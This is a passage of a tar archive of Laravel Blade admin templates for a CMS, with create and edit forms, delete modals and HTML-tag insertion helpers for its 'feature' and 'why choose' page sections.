'section_title')">{{ __('<p>') }}</span> </small> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="title">{{ __('content.title') }}</label> <input type="text" name="title" class="form-control" id="title" value="{{ $item_section->title }}"> <small class="form-text text-muted">{{ __('content.recommended_tags') }} <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('a', 'title')">{{ __('<a href="">') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('br', 'title')">{{ __('<br>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('b', 'title')">{{ __('<b>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('i', 'title')">{{ __('<i>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('span', 'title')">{{ __('<span>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('p', 'title')">{{ __('<p>') }}</span> </small> </div> </div> </div> <button type="submit" class="btn btn-sm btn-primary mr-2">{{ __('content.submit') }}</button> <a href="#" class="btn btn-sm btn-primary" data-toggle="modal" data-target="#featureSectionDestroyModal{{ $item_section->id }}"> <i class="fa fa-trash"></i> {{ __('content.reset') }} </a> </form> <!-- Modal --> <div class="modal fade" id="featureSectionDestroyModal{{ $item_section->id }}" tabindex="-1" role="dialog" aria-labelledby="featureSectionDestroyModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="featureSectionDestroyModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.you_wont_be_able_to_revert_this') }} </div> <div class="modal-footer"> <form class="d-inline-block" action="{{ route('feature-section.destroy', $item_section->id) }}" method="POST"> @method('DELETE') @csrf <button type="button" class="btn btn-danger" data-dismiss="modal">{{ __('content.cancel') }}</button> <button type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </form> </div> </div> </div> </div> @else @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('feature-section.store') }}" method="POST" enctype="multipart/form-data"> @csrf @endif <input type="hidden" name="style" value="{{ $style }}"> <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="section_title">{{ __('content.section_title') }}</label> <input type="text" name="section_title" class="form-control" id="section_title"> <small class="form-text text-muted">{{ __('content.recommended_tags') }} <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('a', 'section_title')">{{ __('<a href="">') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('br', 'section_title')">{{ __('<br>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('b', 'section_title')">{{ __('<b>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('i', 'section_title')">{{ __('<i>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('span', 'section_title')">{{ __('<span>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('p', 'section_title')">{{ __('<p>') }}</span> </small> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="title">{{ __('content.title') }}</label> <input type="text" name="title" class="form-control" id="title"> <small class="form-text text-muted">{{ __('content.recommended_tags') }} <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('a', 'title')">{{ __('<a href="">') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('br', 'title')">{{ __('<br>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('b', 'title')">{{ __('<b>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('i', 'title')">{{ __('<i>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('span', 'title')">{{ __('<span>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('p', 'title')">{{ __('<p>') }}</span> </small> </div> </div> </div> <button type="submit" class="btn btn-sm btn-primary">{{ __('content.submit') }}</button> </form> @endif </div> </div><!-- /.modal-content --> </div><!-- /.modal-dialog --> </div><!-- /.modal --> <div class="modal fade" id="featureModal" tabindex="-1" role="dialog" aria-labelledby="featureModalLabel" aria-modal="false"> <div class="modal-dialog modal-md"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title mt-0 font-16" id="serviceModalLabel">{{ __('content.add_new') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button> </div> <div class="modal-body"> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('feature.store') }}" method="POST" enctype="multipart/form-data"> @csrf @endif <input name="style" type="hidden" value="{{ $style }}"> <div class="row"> <div class="col-md-12"> <fieldset class="form-group"> <legend class="font-14">{{ __('content.type') }}</legend> <div class="form-check pl-0 mb-2"> <label class="form-check-label"> <input type="radio" class="form-check-input mr-2" name="type" id="optionsRadios1" onclick="showHideTypeDiv()" value="icon" checked=""><span class="ml-3">{{ __('content.icon') }}</span> <i class="input-helper"></i> </label> </div> <div class="form-check pl-0"> <label class="form-check-label"> <input type="radio" class="form-check-input mr-1" name="type" id="optionsRadios2" onclick="showHideTypeDiv()" value="image"><span class="ml-3">{{ __('content.image') }}</span> <i class="input-helper"></i></label> </div> </fieldset> <div class="form-group" id="icon-type"> <label for="icon" class="d-block">{{ __('content.icon') }}</label> <div class="btn-group"> <input type="hidden" name="icon" class="form-control" id="icon"> <button type="button" class="btn btn-primary iconpicker-component"><i id="icon-value" class="iconpicker-component"></i></button> <button type="button" id="iconPickerBtn" class="icp icp-dd btn btn-primary dropdown-toggle iconpicker-component" data-selected="fa-car" data-toggle="dropdown"> <span class="caret"></span> </button> <div class="dropdown-menu"></div> </div> </div> <div id="image-type" style="display: none;"> <div class="form-group" > <label for="section_image">{{ __('content.image') }} ({{ __('content.size') }} 64 x 64 (.svg, .jpg, .jpeg, .png, .webp, .gif)</label> <input type="file" name="section_image" class="form-control-file" id="section_image"> <small class="form-text text-muted">{{ __('content.please_use_recommended_sizes') }}</small> </div> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="subtitle">{{ __('content.subtitle') }} </label> <input type="text" name="subtitle" class="form-control" id="subtitle"> <small class="form-text text-muted">{{ __('content.recommended_tags') }} <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('a', 'subtitle')">{{ __('<a href="">') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('br', 'subtitle')">{{ __('<br>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('b', 'subtitle')">{{ __('<b>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('i', 'subtitle')">{{ __('<i>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('span', 'subtitle')">{{ __('<span>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('p', 'subtitle')">{{ __('<p>') }}</span> </small> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="title_2">{{ __('content.title') }} </label> <input type="text" name="title" class="form-control" id="title_2"> <small class="form-text text-muted">{{ __('content.recommended_tags') }} <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('a', 'title_2')">{{ __('<a href="">') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('br', 'title_2')">{{ __('<br>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('b', 'title_2')">{{ __('<b>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('i', 'title_2')">{{ __('<i>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('span', 'title_2')">{{ __('<span>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('p', 'title_2')">{{ __('<p>') }}</span> </small> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="description">{{ __('content.description') }} </label> <textarea name="description" class="form-control" id="description" rows="3"></textarea> <small class="form-text text-muted">{{ __('content.recommended_tags') }} <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('a', 'description')">{{ __('<a href="">') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('br', 'description')">{{ __('<br>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('b', 'description')">{{ __('<b>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('i', 'description')">{{ __('<i>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('span', 'description')">{{ __('<span>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('p', 'description')">{{ __('<p>') }}</span> </small> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="order">{{ __('content.order') }}</label> <input type="number" name="order" class="form-control" id="order" value="0" required> </div> </div> </div> <button type="submit" class="btn btn-sm btn-primary">{{ __('content.submit') }}</button> </form> </div> </div><!-- /.modal-content --> </div><!-- /.modal-dialog --> </div><!-- /.modal --> @endsection ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/admin/sections/feature/edit.blade.php���������������������������������������������������������0000644�����������������00000033360�14765366573�0015012 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@extends('layouts.admin.master') @section('content') <!-- Form row --> <div class="row"> <div class="col-xl-12 box-margin height-card"> <div class="card card-body"> <div class="d-md-flex justify-content-between align-items-center mb-20"> <h4 class="card-title">{{ __('content.edit_feature') }}</h4> <div> <a href="{{ url()->previous() }}" class="btn btn-primary"><i class="fas fa-angle-left"></i> {{ __('content.back') }}</a> </div> </div> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('feature.update', $item->id) }}" method="POST" enctype="multipart/form-data"> @method('PUT') @csrf @endif <input name="style" type="hidden" value="{{ $item->style }}"> <div class="row"> <div class="col-md-12"> <fieldset class="form-group"> <legend class="font-14">{{ __('content.type') }}</legend> <div class="form-check pl-0 mb-2"> <label class="form-check-label"> <input type="radio" class="form-check-input mr-2" name="type" id="optionsRadios1" onclick="showHideTypeDiv()" value="icon" {{ $item->type == 'icon' ? 'checked' : '' }}><span class="ml-3">{{ __('content.icon') }}</span> <i class="input-helper"></i> </label> </div> <div class="form-check pl-0"> <label class="form-check-label"> <input type="radio" class="form-check-input mr-1" name="type" id="optionsRadios2" onclick="showHideTypeDiv()" value="image" {{ $item->type == 'image' ? 'checked' : '' }}><span class="ml-3">{{ __('content.image') }}</span> <i class="input-helper"></i> </label> </div> </fieldset> <div class="form-group" id="icon-type" style="{{ $item->type == 'icon' ? 'display:block' : 'display:none' }}"> <label for="icon" class="d-block">{{ __('content.icon') }}</label> <div class="btn-group"> <input type="hidden" name="icon" class="form-control" id="icon" value="{{ $item->icon }}"> <button type="button" class="btn btn-primary iconpicker-component"><i id="icon-value" class="{{ $item->icon }} iconpicker-component"></i></button> <button type="button" id="iconPickerBtn" class="icp icp-dd btn btn-primary dropdown-toggle iconpicker-component" data-selected="fa-car" data-toggle="dropdown"> <span class="caret"></span> </button> <div class="dropdown-menu"></div> </div> </div> <div id="image-type" style="{{ $item->type == 'image' ? 'display:block' : 'display:none' }}"> <div class="form-group"> <label for="section_image">{{ __('content.image') }} ({{ __('content.size') }} 64 x 64) (.svg, .jpg, .jpeg, .png, .webp, .gif)</label> <input type="file" name="section_image" class="form-control-file" id="section_image"> <small class="form-text text-muted">{{ __('content.please_use_recommended_sizes') }}</small> </div> <div class="height-card box-margin"> <div class="card"> <div class="card-body"> <div class="avatar-area text-center"> <div class="media"> @if (!empty($item->section_image)) <a class="d-block mx-auto" href="#" data-toggle="tooltip" data-placement="top" data-original-title="{{ __('content.current_image') }}"> <img src="{{ asset('uploads/img/feature/'.$item->section_image) }}" alt="image" class="rounded"> </a> @else <a class="d-block mx-auto" href="#" data-toggle="tooltip" data-placement="top" data-original-title="{{ __('content.not_yet_created') }}"> <img src="{{ asset('uploads/img/dummy/no-image.jpg') }}" alt="no image" class="rounded w-25"> </a> @endif </div> @if (!empty($item->section_image)) <a class="mt-3 d-block" href="#" data-toggle="modal" data-target="#deleteImageModal{{ $item->id }}"> <i class="fa fa-trash text-danger font-18"></i> </a> @endif </div> <!--end card-body--> </div> </div> <!--end card--> </div> <!--end col--> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="subtitle">{{ __('content.subtitle') }} </label> <input type="text" name="subtitle" class="form-control" id="subtitle" value="{{ $item->subtitle }}"> <small class="form-text text-muted">{{ __('content.recommended_tags') }} <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('a', 'subtitle')">{{ __('<a href="">') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('br', 'subtitle')">{{ __('<br>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('b', 'subtitle')">{{ __('<b>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('i', 'subtitle')">{{ __('<i>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('span', 'subtitle')">{{ __('<span>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('p', 'subtitle')">{{ __('<p>') }}</span> </small> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="title">{{ __('content.title') }} </label> <input type="text" name="title" class="form-control" id="title" value="{{ $item->title }}"> <small class="form-text text-muted">{{ __('content.recommended_tags') }} <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('a', 'title')">{{ __('<a href="">') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('br', 'title')">{{ __('<br>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('b', 'title')">{{ __('<b>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('i', 'title')">{{ __('<i>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('span', 'title')">{{ __('<span>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('p', 'title')">{{ __('<p>') }}</span> </small> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="description">{{ __('content.description') }} </label> <textarea name="description" class="form-control" id="description" rows="3">{{ $item->description }}</textarea> <small class="form-text text-muted">{{ __('content.recommended_tags') }} <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('a', 'description')">{{ __('<a href="">') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('br', 'description')">{{ __('<br>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('b', 'description')">{{ __('<b>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('i', 'description')">{{ __('<i>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('span', 'description')">{{ __('<span>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('p', 'description')">{{ __('<p>') }}</span> </small> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="order">{{ __('content.order') }}</label> <input type="number" name="order" class="form-control" id="order" value="{{ $item->order }}" required> </div> </div> <div class="col-md-12"> <button type="submit" class="btn btn-primary mr-2">{{ __('content.submit') }}</button> </div> </div> </form> <!-- Modal --> <div class="modal fade" id="deleteImageModal{{ $item->id }}" tabindex="-1" role="dialog" aria-labelledby="deleteImageModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="deleteImageModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.you_wont_be_able_to_revert_this') }} </div> <div class="modal-footer"> <form class="d-inline-block" action="{{ route('feature.destroy_image', $item->id) }}" method="POST"> @method('DELETE') @csrf <button type="button" class="btn btn-danger" data-dismiss="modal">{{ __('content.cancel') }}</button> <button type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </form> </div> </div> </div> </div> </div> </div> </div> <!-- end row --> @endsection ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/admin/sections/why_choose/create.blade.php����������������������������������������������������0000644�����������������00000105547�14765366573�0016053 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@extends('layouts.admin.master') @section('content') <div class="row"> <div class="col-12 box-margin"> <div class="card"> <div class="card-body"> <div class="d-md-flex justify-content-between align-items-center mb-20"> <h6 class="card-title mb-0">{{ __('content.why_choose') }} <div class="btn-group"> <button type="button" class="btn btn-primary btn-sm dropdown-toggle" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false"> {{ __('content.'.$style) }} </button> <div class="dropdown-menu"> <a class="dropdown-item" href="{{ route('why-choose.create', ['style' => 'style1']) }}">{{ __('content.style1') }}</a> </div> </div> <!-- Button --> <a id="hoverButton" class="iyzi-btn"><i class="fas fa-camera"></i> {{ __('content.view_draft') }}</a> <!-- Modal --> <div id="imageModal" class="border border-success iyzi-modal"> <img class="img-fluid " src="{{ asset('uploads/img/dummy/style/why-choose-'.$style.'.jpg') }}" alt="draft image"> </div> </h6> <div> <button type="button" class="btn btn-primary mb-3 mr-2" data-toggle="modal" data-target="#whyChooseSectionModal">{{ __('content.section_title_and_description') }}</button> <button type="button" class="btn btn-primary mb-3" data-toggle="modal" data-target="#whyChooseModal">+ {{ __('content.add_why_choose') }}</button> </div> </div> @if (count($items) > 0) <div class="mr-3"> <input id="check_all" type="checkbox" onclick="showHideDeleteButton(this)"> <label for="check_all">{{ __('content.all') }}</label> <a id="deleteChecked" class="ml-2" href="#" data-toggle="modal" data-target="#deleteCheckedModal"> <i class="fa fa-trash text-danger font-18"></i> </a> </div> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form onsubmit="return btnCheckListGet()" action="{{ route('why-choose.destroy_checked') }}" method="POST"> @method('DELETE') @csrf @endif <input type="hidden" id="checked_lists" name="checked_lists" value=""> <!-- Modal --> <div class="modal fade" id="deleteCheckedModal" tabindex="-1" role="dialog" aria-labelledby="deleteCheckedModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="deleteCheckedModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.delete_selected') }} </div> <div class="modal-footer"> <button type="button" class="btn btn-danger" data-dismiss="modal">{{ __('content.cancel') }}</button> <button onclick="btnCheckListGet()" type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </div> </div> </div> </div> </form> <table id="basic-datatable" class="table table-striped dt-responsive w-100"> <thead> <tr> <th scope="col">#</th> <th>{{ __('content.title') }}</th> <th>{{ __('content.percent_rate') }}</th> <th>{{ __('content.order') }}</th> <th class="custom-width-action">{{ __('content.action') }}</th> </tr> </thead> <tbody> @php $desc = count($items); $asc=0; @endphp @foreach ($items as $item) <tr> <td> <input name="check_list[]" type="checkbox" value="{{ $item->id }}" onclick="showHideDeleteButton2(this)"> <span class="d-none">{{ $asc++ }}{{ $desc-- }}</span> </td> <td>@php echo html_entity_decode($item->title); @endphp</td> <td>{{ $item->timer }}</td> <td>{{ $item->order }}</td> <td> <div> <a href="{{ route('why-choose.edit', $item->id) }}" class="mr-2"> <i class="fa fa-edit text-info font-18"></i> </a> <a href="#" data-toggle="modal" data-target="#deleteModal{{ $item->id }}"> <i class="fa fa-trash text-danger font-18"></i> </a> </div> </td> </tr> <!-- Modal --> <div class="modal fade" id="deleteModal{{ $item->id }}" tabindex="-1" role="dialog" aria-labelledby="whyChooseModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="whyChooseModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.you_wont_be_able_to_revert_this') }} </div> <div class="modal-footer"> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form class="d-inline-block" action="{{ route('why-choose.destroy', $item->id) }}" method="POST"> @method('DELETE') @csrf @endif <button type="button" class="btn btn-danger" data-dismiss="modal">{{ __('content.cancel') }}</button> <button type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </form> </div> </div> </div> </div> @endforeach </tbody> </table> @else <span>{{ __('content.not_yet_created') }}</span> @endif </div> <!-- end card body--> </div> <!-- end card --> </div><!-- end col--> </div><!-- end row--> <div class="modal fade" id="whyChooseSectionModal" tabindex="-1" role="dialog" aria-labelledby="whyChooseSectionModalLabel" aria-modal="false"> <div class="modal-dialog modal-md"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title mt-0 font-16" id="whyChooseSectionModalLabel">{{ __('content.section_title_and_description') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button> </div> <div class="modal-body"> @if (isset($item_section)) @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('why-choose-section.update', $item_section->id) }}" method="POST" enctype="multipart/form-data"> @method('PUT') @csrf @endif <input type="hidden" name="style" value="{{ $style }}"> <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="section_image">{{ __('content.image') }} ({{ __('content.size') }} 480 x 600) (.svg, .jpg, .jpeg, .png, .webp, .gif)</label> <input type="file" name="section_image" class="form-control-file" id="section_image"> <small class="form-text text-muted">{{ __('content.please_use_recommended_sizes') }}</small> </div> <div class="height-card box-margin"> <div class="card"> <div class="card-body"> <div class="avatar-area text-center"> <div class="media"> @if (!empty($item_section->section_image)) <a class="d-block mx-auto" href="#" data-toggle="tooltip" data-placement="top" data-original-title="{{ __('content.current_image') }}"> <img src="{{ asset('uploads/img/why_choose/'.$item_section->section_image) }}" alt="image" class="rounded"> </a> @else <a class="d-block mx-auto" href="#" data-toggle="tooltip" data-placement="top" data-original-title="{{ __('content.current_image') }}"> <img src="{{ asset('uploads/img/dummy/no-image.jpg') }}" alt="no image" class="rounded w-25"> </a> @endif </div> @if (!empty($item_section->section_image)) <a class="mt-3 d-block" href="#" data-toggle="modal" data-target="#deleteImageModal{{ $item_section->id }}"> <i class="fa fa-trash text-danger font-18"></i> </a> @endif </div> <!--end card-body--> </div> </div> <!--end card--> </div> <!--end col--> </div> <div class="col-md-12"> <div class="form-group"> <label for="section_title">{{ __('content.section_title') }}</label> <input type="text" name="section_title" class="form-control" id="section_title" value="{{ $item_section->section_title }}"> <small class="form-text text-muted">{{ __('content.recommended_tags') }} <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('a', 'section_title')">{{ __('<a href="">') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('br', 'section_title')">{{ __('<br>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('b', 'section_title')">{{ __('<b>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('i', 'section_title')">{{ __('<i>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('span', 'section_title')">{{ __('<span>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('p', 'section_title')">{{ __('<p>') }}</small> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="title">{{ __('content.title') }}</label> <input type="text" name="title" class="form-control" id="title" value="{{ $item_section->title }}"> <small class="form-text text-muted">{{ __('content.recommended_tags') }} <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('a', 'title')">{{ __('<a href="">') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('br', 'title')">{{ __('<br>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('b', 'title')">{{ __('<b>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('i', 'title')">{{ __('<i>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('span', 'title')">{{ __('<span>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('p', 'title')">{{ __('<p>') }}</small> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="description">{{ __('content.description') }}</label> <textarea name="description" class="form-control" id="description" rows="3">{{ $item_section->description }}</textarea> <small class="form-text text-muted">{{ __('content.recommended_tags') }} <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('a', 'description')">{{ __('<a href="">') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('br', 'description')">{{ __('<br>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('b', 'description')">{{ __('<b>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('i', 'description')">{{ __('<i>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('span', 'description')">{{ __('<span>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('p', 'description')">{{ __('<p>') }}</small> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="general-item-list">{{ __('content.item') }}</label> <input type="text" name="item" class="form-control" id="general-item-list" value="{{ $item_section->item }}"> </div> </div> </div> <button type="submit" class="btn btn-sm btn-primary mr-2">{{ __('content.submit') }}</button> <a href="#" class="btn btn-sm btn-primary" data-toggle="modal" data-target="#workProcessSectionDestroyModal{{ $item_section->id }}"> <i class="fa fa-trash"></i> {{ __('content.reset') }} </a> </form> <!-- Modal --> <div class="modal fade" id="deleteImageModal{{ $item_section->id }}" tabindex="-1" role="dialog" aria-labelledby="messageModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="messageModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.you_wont_be_able_to_revert_this') }} </div> <div class="modal-footer"> <form class="d-inline-block" action="{{ route('why-choose-section.destroy_image', $item_section->id) }}" method="POST"> @method('DELETE') @csrf <button type="button" class="btn btn-danger" data-dismiss="modal">{{ __('content.cancel') }}</button> <button type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </form> </div> </div> </div> </div> <!-- Modal --> <div class="modal fade" id="workProcessSectionDestroyModal{{ $item_section->id }}" tabindex="-1" role="dialog" aria-labelledby="workProcessSectionDestroyModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="workProcessSectionDestroyModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.you_wont_be_able_to_revert_this') }} </div> <div class="modal-footer"> <form class="d-inline-block" action="{{ route('why-choose-section.destroy', $item_section->id) }}" method="POST"> @method('DELETE') @csrf <button type="button" class="btn btn-danger" data-dismiss="modal">{{ __('content.cancel') }}</button> <button type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </form> </div> </div> </div> </div> @else @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('why-choose-section.store') }}" method="POST" enctype="multipart/form-data"> @csrf @endif <input type="hidden" name="style" value="{{ $style }}"> <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="section_image">{{ __('content.image') }} ({{ __('content.size') }} 480 x 600) (.svg, .jpg, .jpeg, .png, .webp, .gif)</label> <input type="file" name="section_image" class="form-control-file" id="section_image"> <small class="form-text text-muted">{{ __('content.please_use_recommended_sizes') }}</small> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="section_title">{{ __('content.section_title') }}</label> <input type="text" name="section_title" class="form-control" id="section_title"> <small class="form-text text-muted">{{ __('content.recommended_tags') }} <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('a', 'section_title')">{{ __('<a href="">') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('br', 'section_title')">{{ __('<br>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('b', 'section_title')">{{ __('<b>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('i', 'section_title')">{{ __('<i>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('span', 'section_title')">{{ __('<span>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('p', 'section_title')">{{ __('<p>') }}</small> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="title">{{ __('content.title') }}</label> <input type="text" name="title" class="form-control" id="title"> <small class="form-text text-muted">{{ __('content.recommended_tags') }} <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('a', 'title')">{{ 